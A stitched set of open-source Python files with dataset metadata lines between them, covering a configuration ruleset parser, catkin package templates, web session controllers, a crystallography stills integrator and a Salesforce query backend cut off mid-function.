def location(self):
"""Textual representation of this source"""
return repr(self)
@property
def root(self):
"""Directory path for resolving paths relative to this source"""
return None
class RuleSet(OrderedDict, Source):
main_section = NotImplementedAttribute()
def __init__(self, name, base=None, source=None, **kwargs):
super().__init__(**kwargs)
self.name = name
self.base = base
self.source = source
self.variables = OrderedDict()
def contains(self, name):
return name in self or (self.base and self.base.contains(name))
def find_source(self, name):
"""Find top-most ruleset where configuration `name` is defined"""
if name in self:
return self.name
if self.base:
return self.base.find_source(name)
def get_configuration(self, name):
try:
return self[name]
except KeyError:
if self.base:
return self.base.get_configuration(name)
raise
def __setitem__(self, name, item):
assert name not in self
if isinstance(item, AttributesDictionary): # FIXME
self._validate_attributes(name, item)
super().__setitem__(name, item)
def __call__(self, name, **kwargs):
self[name] = self.get_entry_class(name)(**kwargs)
def __repr__(self):
return '{}({})'.format(type(self).__name__, self.name)
def __str__(self):
return repr(self)
def __bool__(self):
return True
RE_VARIABLE = re.compile(r'^\$\(([a-z_ -]+)\)$', re.IGNORECASE)
def _validate_attributes(self, name, attr_dict):
attr_dict.name = name
attr_dict.source = self
for key, val in attr_dict.items():
attr_dict[key] = self._validate_attribute(attr_dict, key, val)
def _validate_attribute(self, attr_dict, name, value):
attribute_type = attr_dict.attribute_type(name)
if isinstance(value, str):
stripped = value.replace('\n', ' ').strip()
m = self.RE_VARIABLE.match(stripped)
if m:
return Var(m.group(1))
value = self._attribute_from_string(attribute_type, stripped)
elif hasattr(value, 'source'):
value.source = self
if not isinstance(value, Var) and not attribute_type.check_type(value):
raise TypeError("{} ({}) is not of the correct type for the '{}' "
"attribute".format(value, type(value).__name__,
name))
return value
@cached
def _attribute_from_string(self, attribute_type, string):
return attribute_type.from_string(string, self)
def get_variable(self, configuration_class, attribute, variable):
try:
value = self.variables[variable.name]
except KeyError:
if not self.base:
raise VariableNotDefined("Variable '{}' is not defined"
.format(variable.name))
return self.base.get_variable(configuration_class, attribute,
variable)
return self._validate_attribute(configuration_class, attribute, value)
def get_entry_class(self, name):
raise NotImplementedError
def _get_value_recursive(self, name, attribute):
if name in self:
entry = self[name]
if attribute in entry:
return entry[attribute]
elif isinstance(entry.base, str):
raise BaseConfigurationException(entry.base)
elif entry.base is not None:
return entry.base[attribute]
if self.base:
return self.base._get_value_recursive(name, attribute)
raise DefaultValueException
@cached
def get_value(self, name, attribute):
try:
return self._get_value_recursive(name, attribute)
except BaseConfigurationException as exc:
return self.get_value(exc.name, attribute)
def _get_value_lookup(self, configurable, attribute, document):
name = configurable.configuration_name(document)
return self.get_value(name, attribute)
def get_value_for(self, configurable, attribute, document):
try:
value = self._get_value_lookup(configurable, attribute, document)
except DefaultValueException:
value = configurable.configuration_class._get_default(attribute)
if isinstance(value, Var):
configuration_class = configurable.configuration_class
value = self.get_variable(configuration_class, attribute, value)
return value
class RuleSetFile(RuleSet):
def __init__(self, filename, base=None, source=None, **kwargs):
self.filename = self._absolute_path(filename, source)
config = ConfigParser(default_section=None, delimiters=('=',),
interpolation=None)
with self.filename.open() as file:
config.read_file(file)
options = dict(config[self.main_section]
if config.has_section(self.main_section) else {})
name = options.pop('name', filename)
base = options.pop('base', base)
options.update(kwargs) # optionally override options
super().__init__(name, base=base, source=source, **options)
if config.has_section('VARIABLES'):
for name, value in config.items('VARIABLES'):
self.variables[name] = value
for section_name, section_body in config.items():
if section_name in (None, self.main_section, 'VARIABLES'):
continue
if ':' in section_name:
name, classifier = (s.strip() for s in section_name.split(':'))
else:
name, classifier = section_name.strip(), None
self.process_section(name, classifier, section_body.items())
@classmethod
def _absolute_path(cls, filename, source):
file_path = Path(filename)
if not file_path.is_absolute():
if source is None or source.root is None:
raise ValueError('{} path should be absolute: {}'
.format(cls.__name__, file_path))
file_path = source.root / file_path
return file_path
@property
def location(self):
return str(self.filename.resolve()), None, None
@property
def root(self):
return self.filename.parent.resolve()
def process_section(self, section_name, classifier, items):
raise NotImplementedError
class Bool(AttributeType):
"""Expresses a binary choice"""
@classmethod
def check_type(cls, value):
return isinstance(value, bool)
@classmethod
def from_tokens(cls, tokens, source):
string = next(tokens).string
lower_string = string.lower()
if lower_string not in ('true', 'false'):
raise ValueError("'{}' is not a valid {}. Must be one of 'true' "
"or 'false'".format(string, cls.__name__))
return lower_string == 'true'
@classmethod
def doc_repr(cls, value):
return '``{}``'.format(str(value).lower())
@classmethod
def doc_format(cls):
return '``true`` or ``false``'
class Integer(AttributeType):
"""Accepts natural numbers"""
@classmethod
def check_type(cls, value):
return isinstance(value, int)
@classmethod
def from_tokens(cls, tokens, source):
token = next(tokens)
sign = 1
if token.exact_type in (MINUS, PLUS):
sign = 1 if token.exact_type == PLUS else -1
token = next(tokens)
if token.type != NUMBER:
raise ParseError('Expecting a number')
try:
value = int(token.string)
except ValueError:
raise ParseError('Expecting an integer')
return sign * value
@classmethod
def doc_format(cls):
return 'a natural number (positive integer)'
class TokenIterator(PeekIterator):
"""Tokenizes `string` and iterates over the tokens"""
def __init__(self, string):
self.string = string
tokens = generate_tokens(StringIO(string).readline)
super().__init__(tokens)
def _advance(self):
result = super()._advance()
if self.next and self.next.type == NEWLINE and self.next.string == '':
super()._advance()
return result
class ParseError(Exception):
pass
# variables
class Var(object):
def __init__(self, name):
super().__init__()
self.name = name
def __repr__(self):
return "{}('{}')".format(type(self).__name__, self.name)
def __str__(self):
return '$({})'.format(self.name)
def __eq__(self, other):
return self.name == other.name
class VariableNotDefined(Exception):
pass
| agpl-3.0 | -5,342,931,260,759,857,000 | 32.710098 | 81 | 0.576239 | false | 4.414161 | true | false | false |
davetcoleman/catkin_pkg | src/catkin_pkg/package_templates.py | 3 | 18106 | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import getpass
import os
import string
import sys
from catkin_pkg.cmake import configure_file
from catkin_pkg.cmake import get_metapackage_cmake_template_path
from catkin_pkg.package import Dependency
from catkin_pkg.package import Package
from catkin_pkg.package import PACKAGE_MANIFEST_FILENAME
from catkin_pkg.package import Person
class PackageTemplate(Package):
def __init__(self, catkin_deps=None, system_deps=None, boost_comps=None, **kwargs):
super(PackageTemplate, self).__init__(**kwargs)
self.catkin_deps = catkin_deps or []
self.system_deps = system_deps or []
self.boost_comps = boost_comps or []
self.validate()
@staticmethod
def _create_package_template(package_name, description=None, licenses=None,
maintainer_names=None, author_names=None,
version=None, catkin_deps=None, system_deps=None,
boost_comps=None):
"""
alternative factory method mapping CLI args to argument for
Package class
:param package_name:
:param description:
:param licenses:
:param maintainer_names:
:param authors:
:param version:
:param catkin_deps:
"""
# Sort so they are alphebetical
licenses = list(licenses or ["TODO"])
licenses.sort()
if not maintainer_names:
maintainer_names = [getpass.getuser()]
maintainer_names = list(maintainer_names or [])
maintainer_names.sort()
maintainers = []
for maintainer_name in maintainer_names:
maintainers.append(
Person(maintainer_name,
'%s@todo.todo' % maintainer_name.split()[-1])
)
author_names = list(author_names or [])
author_names.sort()
authors = []
for author_name in author_names:
authors.append(Person(author_name))
catkin_deps = list(catkin_deps or [])
catkin_deps.sort()
pkg_catkin_deps = []
build_depends = []
run_depends = []
buildtool_depends = [Dependency('catkin')]
for dep in catkin_deps:
if dep.lower() == 'catkin':
catkin_deps.remove(dep)
continue
if dep.lower() == 'genmsg':
sys.stderr.write('WARNING: Packages with messages or services should not depend on genmsg, but on message_generation and message_runtime\n')
buildtool_depends.append(Dependency('genmsg'))
continue
if dep.lower() == 'message_generation':
if not 'message_runtime' in catkin_deps:
sys.stderr.write('WARNING: Packages with messages or services should depend on both message_generation and message_runtime\n')
build_depends.append(Dependency('message_generation'))
continue
if dep.lower() == 'message_runtime':
if not 'message_generation' in catkin_deps:
sys.stderr.write('WARNING: Packages with messages or services should depend on both message_generation and message_runtime\n')
run_depends.append(Dependency('message_runtime'))
continue
pkg_catkin_deps.append(Dependency(dep))
for dep in pkg_catkin_deps:
build_depends.append(dep)
run_depends.append(dep)
if boost_comps:
if not system_deps:
system_deps = ['boost']
elif not 'boost' in system_deps:
system_deps.append('boost')
for dep in system_deps or []:
if not dep.lower().startswith('python-'):
build_depends.append(Dependency(dep))
run_depends.append(Dependency(dep))
package_temp = PackageTemplate(
name=package_name,
version=version or '0.0.0',
description=description or 'The %s package' % package_name,
buildtool_depends=buildtool_depends,
build_depends=build_depends,
run_depends=run_depends,
catkin_deps=catkin_deps,
system_deps=system_deps,
boost_comps=boost_comps,
licenses=licenses,
authors=authors,
maintainers=maintainers,
urls=[])
return package_temp
def read_template_file(filename, rosdistro):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
templates = []
templates.append(os.path.join(template_dir, rosdistro, '%s.in' % filename))
templates.append(os.path.join(template_dir, '%s.in' % filename))
for template in templates:
if os.path.isfile(template):
with open(template, 'r') as fhand:
template_contents = fhand.read()
return template_contents
raise IOError(
"Could not read template for ROS distro "
"'{}' at '{}': ".format(rosdistro, ', '.join(templates)) +
"no such file or directory"
)
def _safe_write_files(newfiles, target_dir):
"""
writes file contents to target_dir/filepath for all entries of newfiles.
Aborts early if files exist in places for new files or directories
:param newfiles: a dict {filepath: contents}
:param target_dir: a string
"""
# first check no filename conflict exists
for filename in newfiles:
target_file = os.path.join(target_dir, filename)
if os.path.exists(target_file):
raise ValueError('File exists: %s' % target_file)
dirname = os.path.dirname(target_file)
while(dirname != target_dir):
if os.path.isfile(dirname):
raise ValueError('Cannot create directory, file exists: %s' %
dirname)
dirname = os.path.dirname(dirname)
for filename, content in newfiles.items():
target_file = os.path.join(target_dir, filename)
dirname = os.path.dirname(target_file)
if not os.path.exists(dirname):
os.makedirs(dirname)
# print(target_file, content)
with open(target_file, 'ab') as fhand:
fhand.write(content.encode())
print('Created file %s' % os.path.relpath(target_file, os.path.dirname(target_dir)))
def create_package_files(target_path, package_template, rosdistro,
newfiles=None, meta=False):
"""
creates several files from templates to start a new package.
:param target_path: parent folder where to create the package
:param package_template: contains the required information
:param rosdistro: name of the distro to look up respective template
:param newfiles: dict {filepath: contents} for additional files to write
"""
if newfiles is None:
newfiles = {}
# allow to replace default templates when path string is equal
manifest_path = os.path.join(target_path, PACKAGE_MANIFEST_FILENAME)
if manifest_path not in newfiles:
newfiles[manifest_path] = \
create_package_xml(package_template, rosdistro, meta=meta)
cmake_path = os.path.join(target_path, 'CMakeLists.txt')
if not cmake_path in newfiles:
newfiles[cmake_path] = create_cmakelists(package_template, rosdistro, meta=meta)
_safe_write_files(newfiles, target_path)
if 'roscpp' in package_template.catkin_deps:
fname = os.path.join(target_path, 'include', package_template.name)
os.makedirs(fname)
print('Created folder %s' % os.path.relpath(fname, os.path.dirname(target_path)))
if 'roscpp' in package_template.catkin_deps or \
'rospy' in package_template.catkin_deps:
fname = os.path.join(target_path, 'src')
os.makedirs(fname)
print('Created folder %s' % os.path.relpath(fname, os.path.dirname(target_path)))
class CatkinTemplate(string.Template):
"""subclass to use @ instead of $ as markers"""
delimiter = '@'
escape = '@'
def create_cmakelists(package_template, rosdistro, meta=False):
"""
:param package_template: contains the required information
:returns: file contents as string
"""
if meta:
template_path = get_metapackage_cmake_template_path()
temp_dict = {'name': package_template.name,
'metapackage_arguments': ''
}
return configure_file(template_path, temp_dict)
else:
cmakelists_txt_template = read_template_file('CMakeLists.txt', rosdistro)
ctemp = CatkinTemplate(cmakelists_txt_template)
if package_template.catkin_deps == []:
components = ''
else:
components = ' COMPONENTS\n %s\n' % '\n '.join(package_template.catkin_deps)
boost_find_package = \
('' if not package_template.boost_comps
else ('find_package(Boost REQUIRED COMPONENTS %s)\n' %
' '.join(package_template.boost_comps)))
system_find_package = ''
for sysdep in package_template.system_deps:
if sysdep == 'boost':
continue
if sysdep.startswith('python-'):
system_find_package += '# '
system_find_package += 'find_package(%s REQUIRED)\n' % sysdep
# provide dummy values
catkin_depends = (' '.join(package_template.catkin_deps)
if package_template.catkin_deps
else 'other_catkin_pkg')
system_depends = (' '.join(package_template.system_deps)
if package_template.system_deps
else 'system_lib')
message_pkgs = [pkg for pkg in package_template.catkin_deps if pkg.endswith('_msgs')]
if message_pkgs:
message_depends = '# %s' % '# '.join(message_pkgs)
else:
message_depends = '# std_msgs # Or other packages containing msgs'
temp_dict = {'name': package_template.name,
'components': components,
'include_directories': _create_include_macro(package_template),
'boost_find': boost_find_package,
'systems_find': system_find_package,
'catkin_depends': catkin_depends,
'system_depends': system_depends,
'target_libraries': _create_targetlib_args(package_template),
'message_dependencies': message_depends
}
return ctemp.substitute(temp_dict)
def _create_targetlib_args(package_template):
result = '# ${catkin_LIBRARIES}\n'
if package_template.boost_comps:
result += '# ${Boost_LIBRARIES}\n'
if package_template.system_deps:
result += (''.join(['# ${%s_LIBRARIES}\n' %
sdep for sdep in package_template.system_deps]))
return result
def _create_include_macro(package_template):
result = '# include_directories(include)'
includes = []
if package_template.catkin_deps:
includes.append('${catkin_INCLUDE_DIRS}')
if package_template.boost_comps:
includes.append('${Boost_INCLUDE_DIRS}')
if package_template.system_deps:
deplist = []
for sysdep in package_template.system_deps:
if not sysdep.startswith('python-'):
deplist.append(sysdep)
includes.append('${%s_INCLUDE_DIRS}' % sysdep)
if deplist:
result += '\n# TODO: Check names of system library include directories (%s)' % ', '.join(deplist)
if includes:
result += '\ninclude_directories(\n %s\n)' % '\n '.join(includes)
return result
def _create_depend_tag(dep_type,
name,
version_eq=None,
version_lt=None,
version_lte=None,
version_gt=None,
version_gte=None):
"""
Helper to create xml snippet for package.xml
"""
version_string = []
for key, var in {'version_eq': version_eq,
'version_lt': version_lt,
'version_lte': version_lte,
'version_gt': version_gt,
'version_gte': version_gte}.items():
if var is not None:
version_string.append(' %s="%s"' % (key, var))
result = ' <%s%s>%s</%s>\n' % (dep_type,
''.join(version_string),
name,
dep_type)
return result
def create_package_xml(package_template, rosdistro, meta=False):
"""
:param package_template: contains the required information
:returns: file contents as string
"""
package_xml_template = \
read_template_file(PACKAGE_MANIFEST_FILENAME, rosdistro)
ctemp = CatkinTemplate(package_xml_template)
temp_dict = {}
for key in package_template.__slots__:
temp_dict[key] = getattr(package_template, key)
if package_template.version_abi:
temp_dict['version_abi'] = ' abi="%s"' % package_template.version_abi
else:
temp_dict['version_abi'] = ''
if not package_template.description:
temp_dict['description'] = 'The %s package ...' % package_template.name
licenses = []
for plicense in package_template.licenses:
licenses.append(' <license>%s</license>\n' % plicense)
temp_dict['licenses'] = ''.join(licenses)
def get_person_tag(tagname, person):
email_string = (
"" if person.email is None else 'email="%s"' % person.email
)
return ' <%s %s>%s</%s>\n' % (tagname, email_string,
person.name, tagname)
maintainers = []
for maintainer in package_template.maintainers:
maintainers.append(get_person_tag('maintainer', maintainer))
temp_dict['maintainers'] = ''.join(maintainers)
urls = []
for url in package_template.urls:
type_string = ("" if url.type is None
else 'type="%s"' % url.type)
urls.append(' <url %s >%s</url>\n' % (type_string, url.url))
temp_dict['urls'] = ''.join(urls)
authors = []
for author in package_template.authors:
authors.append(get_person_tag('author', author))
temp_dict['authors'] = ''.join(authors)
dependencies = []
dep_map = {
'build_depend': package_template.build_depends,
'buildtool_depend': package_template.buildtool_depends,
'run_depend': package_template.run_depends,
'test_depend': package_template.test_depends,
'conflict': package_template.conflicts,
'replace': package_template.replaces
}
for dep_type in ['buildtool_depend', 'build_depend', 'run_depend',
'test_depend', 'conflict', 'replace']:
for dep in sorted(dep_map[dep_type], key=lambda x: x.name):
if 'depend' in dep_type:
dep_tag = _create_depend_tag(
dep_type,
dep.name,
dep.version_eq,
dep.version_lt,
dep.version_lte,
dep.version_gt,
dep.version_gte
)
dependencies.append(dep_tag)
else:
dependencies.append(_create_depend_tag(dep_type,
dep.name))
temp_dict['dependencies'] = ''.join(dependencies)
exports = []
if package_template.exports is not None:
for export in package_template.exports:
if export.content is not None:
print('WARNING: Create package does not know how to '
'serialize exports with content: '
'%s, %s, ' % (export.tagname, export.attributes) +
'%s' % (export.content),
file=sys.stderr)
else:
attribs = [' %s="%s"' % (k, v) for (k, v) in export.attributes.items()]
line = ' <%s%s/>\n' % (export.tagname, ''.join(attribs))
exports.append(line)
if meta:
exports.append(' <metapackage/>')
temp_dict['exports'] = ''.join(exports)
temp_dict['components'] = package_template.catkin_deps
return ctemp.substitute(temp_dict)
| bsd-3-clause | -7,094,375,736,727,865,000 | 40.243736 | 156 | 0.591738 | false | 4.16613 | false | false | false |
openfisca/LawToCode | lawtocode/controllers/sessions.py | 1 | 3560 | # -*- coding: utf-8 -*-
# Law-to-Code -- Extract formulas & parameters from laws
# By: Emmanuel Raviart <emmanuel@raviart.com>
#
# Copyright (C) 2013 OpenFisca Team
# https://github.com/openfisca/LawToCode
#
# This file is part of Law-to-Code.
#
# Law-to-Code is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Law-to-Code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Controllers for sessions"""
import collections
import logging
import webob
from .. import contexts, conv, model, paginations, templates, urls, wsgihelpers
log = logging.getLogger(__name__)
@wsgihelpers.wsgify
def admin_delete(req):
ctx = contexts.Ctx(req)
session = ctx.node
if not model.is_admin(ctx):
return wsgihelpers.forbidden(ctx,
explanation = ctx._("Deletion forbidden"),
message = ctx._("You can not delete a session."),
title = ctx._('Operation denied'),
)
if req.method == 'POST':
session.delete(ctx, safe = True)
return wsgihelpers.redirect(ctx, location = model.Session.get_admin_class_url(ctx))
return templates.render(ctx, '/sessions/admin-delete.mako', session = session)
@wsgihelpers.wsgify
def admin_index(req):
ctx = contexts.Ctx(req)
model.is_admin(ctx, check = True)
assert req.method == 'GET'
page_number, error = conv.pipe(
conv.input_to_int,
conv.test_greater_or_equal(1),
conv.default(1),
)(req.params.get('page'), state = ctx)
if error is not None:
return wsgihelpers.not_found(ctx, explanation = ctx._('Page number error: {}').format(error))
cursor = model.Session.find(as_class = collections.OrderedDict)
pager = paginations.Pager(item_count = cursor.count(), page_number = page_number)
sessions = cursor.skip(pager.first_item_index or 0).limit(pager.page_size)
return templates.render(ctx, '/sessions/admin-index.mako', sessions = sessions, pager = pager)
@wsgihelpers.wsgify
def admin_view(req):
ctx = contexts.Ctx(req)
session = ctx.node
model.is_admin(ctx, check = True)
return templates.render(ctx, '/sessions/admin-view.mako', session = session)
def route_admin(environ, start_response):
req = webob.Request(environ)
ctx = contexts.Ctx(req)
session, error = conv.pipe(
conv.input_to_uuid,
conv.not_none,
model.Session.uuid_to_instance,
)(req.urlvars.get('token'), state = ctx)
if error is not None:
return wsgihelpers.not_found(ctx, explanation = ctx._('Session Error: {}').format(error))(
environ, start_response)
ctx.node = session
router = urls.make_router(
('GET', '^/?$', admin_view),
(('GET', 'POST'), '^/delete/?$', admin_delete),
)
return router(environ, start_response)
def route_admin_class(environ, start_response):
router = urls.make_router(
('GET', '^/?$', admin_index),
(None, '^/(?P<token>[^/]+)(?=/|$)', route_admin),
)
return router(environ, start_response)
| agpl-3.0 | 6,062,235,559,573,949,000 | 29.956522 | 101 | 0.658146 | false | 3.552894 | false | false | false |
dials/dials | algorithms/integration/integrator_stills.py | 1 | 7546 | class ReflectionBlockIntegratorStills:
"""A class to perform the integration."""
def __init__(self, params, experiments, reference, extractor=None):
"""Initialise the integrator."""
from dials.algorithms import shoebox
# Ensure we have 1 experiment at the moment
assert len(experiments) == 1
assert extractor is not None
# Save the parameters
self.params = params
self.experiments = experiments
self.extractor = extractor
# Create the shoebox masker
n_sigma = params.integration.shoebox.n_sigma
assert n_sigma > 0
self._mask_profiles = shoebox.MaskerEmpirical(
experiments[0], reference=reference
)
def integrate(self):
"""Integrate all the reflections."""
from dials.algorithms.shoebox import MaskCode
from dials.array_family import flex
result = flex.reflection_table()
for indices, reflections in self.extractor:
self._mask_profiles(reflections, None)
reflections.integrate(self.experiments[0])
bg_code = MaskCode.Valid | MaskCode.BackgroundUsed
fg_code = MaskCode.Valid | MaskCode.Foreground
n_bg = reflections["shoebox"].count_mask_values(bg_code)
n_fg = reflections["shoebox"].count_mask_values(fg_code)
reflections["n_background"] = n_bg
reflections["n_foreground"] = n_fg
del reflections["shoebox"]
del reflections["rs_shoebox"]
result.extend(reflections)
assert len(result) > 0
result.sort("miller_index")
return result
class IntegratorStills:
"""Integrate reflections"""
def __init__(self, params, exlist, reference=None, predicted=None, shoeboxes=None):
"""Initialise the script."""
assert reference is not None
# Load the extractor based on the input
if shoeboxes is not None:
extractor = self._load_extractor(shoeboxes, params, exlist)
else:
if predicted is None:
predicted = self._predict_reflections(params, exlist)
# predicted = self._filter_reflections(params, exlist, predicted) # FIXME
predicted = self._match_with_reference(predicted, reference)
import math
from annlib_ext import AnnAdaptor
from dials.array_family import flex
matcheddata = predicted.select(
predicted.get_flags(predicted.flags.reference_spot)
)
A = AnnAdaptor(matcheddata["xyzcal.mm"].as_double(), 3, 10)
A.query(predicted["xyzcal.mm"].as_double())
bboxes = flex.int6()
for i, ref in enumerate(predicted):
nn_pred = [matcheddata[A.nn[i * 10 + j]] for j in range(10)]
nn_ref = [
reference[reference["miller_index"].first_index(r["miller_index"])]
for r in nn_pred
]
max_x = max([r["bbox"][1] - r["bbox"][0] for r in nn_ref])
max_y = max([r["bbox"][3] - r["bbox"][2] for r in nn_ref])
panel = exlist[ref["id"]].detector[ref["panel"]]
imgsize_x, imgsize_y = panel.get_image_size()
x1 = int(math.floor(ref["xyzcal.px"][0] - (max_x / 2)))
x2 = int(math.ceil(ref["xyzcal.px"][0] + (max_x / 2)))
y1 = int(math.floor(ref["xyzcal.px"][1] - (max_y / 2)))
y2 = int(math.ceil(ref["xyzcal.px"][1] + (max_y / 2)))
if x1 < 0:
x1 = 0
if y1 < 0:
y1 = 0
if x2 > imgsize_x:
x2 = imgsize_x
if y2 > imgsize_y:
y2 = imgsize_y
bboxes.append((x1, x2, y1, y2, 0, 1))
predicted["bbox"] = bboxes
extractor = self._create_extractor(params, exlist, predicted)
# Initialise the integrator
self._integrator = ReflectionBlockIntegratorStills(
params, exlist, reference, extractor
)
def integrate(self):
"""Integrate the reflections."""
return self._integrator.integrate()
def _match_with_reference(self, predicted, reference):
"""Match predictions with reference spots."""
from dials.algorithms.spot_finding.spot_matcher import SpotMatcher
from dials.util.command_line import Command
Command.start("Matching reference spots with predicted reflections")
match = SpotMatcher(max_separation=1)
rind, pind = match(reference, predicted)
h1 = predicted.select(pind)["miller_index"]
h2 = reference.select(rind)["miller_index"]
mask = h1 == h2
predicted.set_flags(pind.select(mask), predicted.flags.reference_spot)
Command.end(
"Matched %d reference spots with predicted reflections" % mask.count(True)
)
return predicted
def _load_extractor(self, filename, params, exlist):
"""Load the shoebox extractor."""
from dials.model.serialize.reflection_block import ReflectionBlockExtractor
assert len(exlist) == 1
imageset = exlist[0].imageset
return ReflectionBlockExtractor(
filename, params.integration.shoebox.block_size, imageset
)
def _create_extractor(self, params, exlist, predicted):
"""Create the extractor."""
from dials.model.serialize.reflection_block import ReflectionBlockExtractor
assert len(exlist) == 1
imageset = exlist[0].imageset
return ReflectionBlockExtractor(
"shoebox.dat", params.integration.shoebox.block_size, imageset, predicted
)
def _predict_reflections(self, params, experiments):
"""Predict all the reflections."""
from dials.array_family import flex
result = flex.reflection_table()
for i, experiment in enumerate(experiments):
predicted = flex.reflection_table.from_predictions(experiment)
predicted["id"] = flex.int(len(predicted), i)
result.extend(predicted)
return result
def _filter_reflections(self, params, experiments, reflections):
"""Filter the reflections to integrate."""
from dials.algorithms import filtering
from dials.array_family import flex
from dials.util.command_line import Command
# Set all reflections which overlap bad pixels to zero
Command.start("Filtering reflections by detector mask")
if experiments[0].scan is None:
array_range = 1
else:
array_range = experiments[0].scan.get_array_range()
mask = filtering.by_detector_mask(
reflections["bbox"],
experiments[0].imageset.get_raw_data(0)[0] >= 0,
array_range,
)
reflections.del_selected(not mask)
Command.end(f"Filtered {len(reflections)} reflections by detector mask")
# Filter the reflections by zeta
min_zeta = params.integration.filter.by_zeta
if min_zeta > 0:
Command.start(f"Filtering reflections by zeta >= {min_zeta:f}")
zeta = reflections.compute_zeta(experiments[0])
reflections.del_selected(flex.abs(zeta) < min_zeta)
n = len(reflections)
Command.end("Filtered %d reflections by zeta >= %f" % (n, min_zeta))
return reflections
| bsd-3-clause | -5,393,693,544,913,015,000 | 36.919598 | 89 | 0.590246 | false | 4.026681 | false | false | false |
philchristensen/django-salesforce | salesforce/backend/query.py | 1 | 21370 | # django-salesforce
#
# by Phil Christensen
# (c) 2012-2013 Freelancers Union (http://www.freelancersunion.org)
# See LICENSE.md for details
#
"""
Salesforce object query and queryset customizations.
"""
# TODO hynekcer: class CursorWrapper and function handle_api_exceptions should
# be moved to salesforce.backend.driver at the next big refactoring
# (Evenso some low level internals of salesforce.auth should be moved to
# salesforce.backend.driver.Connection)
import logging, types, datetime, decimal
from django.conf import settings
from django.core.serializers import python
from django.core.exceptions import ImproperlyConfigured
from django.db import connections
from django.db.models import query, Count
from django.db.models.sql import Query, RawQuery, constants, subqueries
from django.db.models.sql.datastructures import EmptyResultSet
from django.db.models.query_utils import deferred_class_factory
from django.utils.six import PY3
from itertools import islice
import requests
import pytz
from salesforce import auth, models, DJANGO_16_PLUS, DJANGO_17_PLUS, DJANGO_18_PLUS
from salesforce import DJANGO_184_PLUS
from salesforce.backend.compiler import SQLCompiler
from salesforce.fields import NOT_UPDATEABLE, NOT_CREATEABLE, SF_PK
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
import json
except ImportError:
import simplejson as json
log = logging.getLogger(__name__)
API_STUB = '/services/data/v34.0'
# Values of seconds are with 3 decimal places in SF, but they are rounded to
# whole seconds for the most of fields.
SALESFORCE_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f+0000'
DJANGO_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S.%f-00:00'
request_count = 0
def quoted_string_literal(s, d):
"""
SOQL requires single quotes to be escaped.
http://www.salesforce.com/us/developer/docs/soql_sosl/Content/sforce_api_calls_soql_select_quotedstringescapes.htm
"""
try:
return "'%s'" % (s.replace("\\", "\\\\").replace("'", "\\'"),)
except TypeError as e:
raise NotImplementedError("Cannot quote %r objects: %r" % (type(s), s))
def process_args(args):
"""
Perform necessary quoting on the arg list.
"""
def _escape(item, conv):
if(isinstance(item, models.SalesforceModel)):
return conv.get(models.SalesforceModel, conv[str])(item, conv)
if(isinstance(item, decimal.Decimal)):
return conv.get(decimal.Decimal, conv[str])(item, conv)
return conv.get(type(item), conv[str])(item, conv)
return tuple([_escape(x, sql_conversions) for x in args])
def process_json_args(args):
"""
Perform necessary JSON quoting on the arg list.
"""
def _escape(item, conv):
if(isinstance(item, models.SalesforceModel)):
return conv.get(models.SalesforceModel, conv[str])(item, conv)
if(isinstance(item, decimal.Decimal)):
return conv.get(decimal.Decimal, conv[str])(item, conv)
return conv.get(type(item), conv[str])(item, conv)
return tuple([_escape(x, json_conversions) for x in args])
def handle_api_exceptions(url, f, *args, **kwargs):
"""Call REST API and handle exceptions
Params:
f: requests.get or requests.post...
_cursor: sharing the debug information in cursor
"""
global request_count
from salesforce.backend import base
# The 'verify' option is about verifying SSL certificates
kwargs_in = {'timeout': getattr(settings, 'SALESFORCE_QUERY_TIMEOUT', 3),
'verify': True}
kwargs_in.update(kwargs)
_cursor = kwargs_in.pop('_cursor', None)
log.debug('Request API URL: %s' % url)
request_count += 1
try:
response = f(url, *args, **kwargs_in)
# TODO some timeouts can be rarely raised as "SSLError: The read operation timed out"
except requests.exceptions.Timeout:
raise base.SalesforceError("Timeout, URL=%s" % url)
if response.status_code == 401:
# Unauthorized (expired or invalid session ID or OAuth)
data = response.json()[0]
if(data['errorCode'] == 'INVALID_SESSION_ID'):
token = db_alias=f.__self__.auth.reauthenticate()
if('headers' in kwargs):
kwargs['headers'].update(dict(Authorization='OAuth %s' % token))
try:
response = f(url, *args, **kwargs_in)
except requests.exceptions.Timeout:
raise base.SalesforceError("Timeout, URL=%s" % url)
if response.status_code in (200, 201, 204):
return response
